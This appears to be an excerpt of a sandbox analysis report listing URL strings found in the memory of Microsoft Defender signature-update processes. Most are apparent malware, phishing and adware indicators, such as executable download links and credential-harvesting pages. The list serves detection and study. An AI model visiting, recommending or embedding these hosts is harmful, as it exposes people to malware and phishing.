Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
Source: mpam-728dfe11.exe, 00000011.00000003.18581318930.0000027770032000.00000004.00000001.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 0000000B.00000003.18304294619.0000021B5E481000.00000004.00000001.sdmp String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://images.google.cn/images?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://img.zhongsou.com/i?w=%s
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://imp.fusioninstall.com/impression.do/?event=installer_start&referrer=x
Source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp String found in binary or memory: http://imp.mymapsxp.com/
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://imp.theweathercenter.co/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://indonesiacyberteam.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18295295594.0000021B5F05F000.00000004.00000001.sdmp String found in binary or memory: http://inent17alexe.rr
Source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp String found in binary or memory: http://infolokercpns.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://init.crash-analysis.com
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-analysis.com
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://init.icloud-diagnostics.com
Source: MpSigStub.exe, 0000000B.00000003.18290346896.0000021B5F264000.00000004.00000001.sdmp String found in binary or memory: http://injectsorals.com/
Source: MpSigStub.exe, 0000000B.00000003.18320954944.0000021B5E356000.00000004.00000001.sdmp String found in binary or memory: http://inline477.info/fsrv
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ins.pricejs.net/dealdo/install-report
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ins.pricejs.net/dealdo/install-report?type=install
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://ins.quickinstallpack.com/?action=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ins.rdxrp.com/stats/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://insf.quickinstallpack.com/?action=
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://insightout-me.com/backup/excellview.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://install-apps.com/s2s_install.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://install-apps.com/s2s_install.exex
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://install-finder.com/
Source: MpSigStub.exe, 0000000B.00000003.18300431925.0000021B5E6BC000.00000004.00000001.sdmp String found in binary or memory: http://install.outbrowse.com/logTrack.php?x
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://install.xxxtoolbar.com/ist/scripts/prompt.php?
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://install1.ring520.org/kkkk/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://installdream.com/download/blankNet2.dat
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp String found in binary or memory: http://installer.mediapassplugin.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://installmp3codec.info/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://installs.hotbar.com/installs/hotbar/programs/
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://instamailserver.link/finito.ps1
Source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp String found in binary or memory: http://instituitartetculture.com/
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://int.dpool.sina.com.cn/iplookup/iplookup.php
Source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp String found in binary or memory: http://interstat.eux
Source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json/
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/line/?fields=queryz
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://ip.aq138.com/setip.asp
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://isearch.omiga-plus.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://istanbulyilbasimekanlari.com/tracking-number-
Source: MpSigStub.exe, 0000000B.00000003.18263377234.0000021B5F335000.00000004.00000001.sdmp String found in binary or memory: http://istart.webssearches.com/?type=sc
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://isvbr.net?t=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://itemprice.kr
Source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp String found in binary or memory: http://iz.orda.icu/webiz.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://j.pricejs.net/
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://jL.ch&#117;ra.pl&#47;rc/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://japanesecosplaygirl.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18275295752.0000021B5E8EE000.00000004.00000001.sdmp String found in binary or memory: http://java-se.com/o.js
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://javascriptobfuscator.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://jetroute.net
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://jmmgroup.ae/coo.exe
Source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/eml/put.php
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://joelosteel.gdn/pi.php
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://jquerystatistics.org/update.js
Source: MpSigStub.exe, 0000000B.00000003.18313245562.0000021B5F125000.00000004.00000001.sdmp String found in binary or memory: http://jqueryui.com
Source: MpSigStub.exe, 0000000B.00000003.18294709706.0000021B5EF15000.00000004.00000001.sdmp String found in binary or memory: http://js.k0102.com/ad
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.com
Source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp String found in binary or memory: http://js.pkglayer.comx
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://juntec.es/rechnung-18561/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://justgaytgp.net/rd/out.php
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://jxmienphi.net/update/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://jxvh.com/goto.php
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp, MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://jyhjyy.top
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://kapper.st/info.txt
Source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp String found in binary or memory: http://karab.hopto.org/sarg.dot
Source: MpSigStub.exe, 0000000B.00000003.18297024822.0000021B5EAF3000.00000004.00000001.sdmp String found in binary or memory: http://karafetdoll.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp String found in binary or memory: http://kavok.ind.br/ds/2312.gif
Source: MpSigStub.exe, 0000000B.00000003.18297589169.0000021B5EB76000.00000004.00000001.sdmp String found in binary or memory: http://kec-rupit.muratarakab.go.id/si/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://keeppure.cn/tool/xxz.exe
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp String found in binary or memory: http://kemra.co.ke/bbaoh/
Source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp String found in binary or memory: http://keratomir.biz/get.php?partner=
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://king.connectioncdn.
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://kit.mastacash.com/
Source: MpSigStub.exe, 0000000B.00000003.18308581579.0000021B5F22C000.00000004.00000001.sdmp String found in binary or memory: http://kle.austries
Source: MpSigStub.exe, 0000000B.00000003.18290670791.0000021B5EA2C000.00000004.00000001.sdmp String found in binary or memory: http://kokovs.cc/porno/stat.php
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp String found in binary or memory: http://kollaboration.intranet.stzh.ch/orga/asz-aszdokumentenbibliothek/Vorlagen/Makros/MakroMasterSt
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://kolo.crionn.com/kolo.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 0000000B.00000003.18275386959.0000021B5E902000.00000004.00000001.sdmp String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://ksn.a
Source: MpSigStub.exe, 0000000B.00000003.18280647383.0000021B5DE04000.00000004.00000001.sdmp String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 0000000B.00000003.18320288608.0000021B5E3DB000.00000004.00000001.sdmp String found in binary or memory: http://ldjb.sriki.space/is/cact?i
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://license.mediapassonline.com/license1.aspl__
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://licenses.overpeer.com/simple_license.aspx
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://localhost/sss_/downloads/install.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.json
Source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp String found in binary or memory: http://log.dataurls.com/log/settings.jsonxN
Source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp String found in binary or memory: http://log.newhybridhome.com/personal.dll
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 0000000B.00000003.18299817677.0000021B5E12B000.00000004.00000001.sdmp String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp String found in binary or memory: http://luyitaw.com/okasle.exe
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 0000000B.00000003.18293836972.0000021B5E00C000.00000004.00000001.sdmp String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 0000000B.00000003.18275817344.0000021B5E2D6000.00000004.00000001.sdmp String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 0000000B.00000003.18300281159.0000021B5E69B000.00000004.00000001.sdmp String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/?aid=347
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://malwaredestructor.com/download.php?aid=347
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 0000000B.00000003.18287502945.0000021B5FA2A000.00000004.00000001.sdmp String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 0000000B.00000003.18315004497.0000021B5E589000.00000004.00000001.sdmp String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 0000000B.00000003.18273552821.0000021B5FC51000.00000004.00000001.sdmp String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 0000000B.00000003.18286937753.0000021B5E799000.00000004.00000001.sdmp String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 0000000B.00000003.18279834692.0000021B5F26F000.00000004.00000001.sdmp String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://max-stats.com
Source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media-plugin.info/tantyy.cgi
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.downloadmediacentral.com/law/?decinformation=
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.sql.md
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp String found in binary or memory: http://media.toopid.info?r=wmp&title=
Source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 0000000B.00000003.18268434459.0000021B5F9A6000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 0000000B.00000003.18283134049.0000021B5DEC3000.00000004.00000001.sdmp String found in binary or memory: http://mediabusnetwork.com/preconfirm.php?aid=
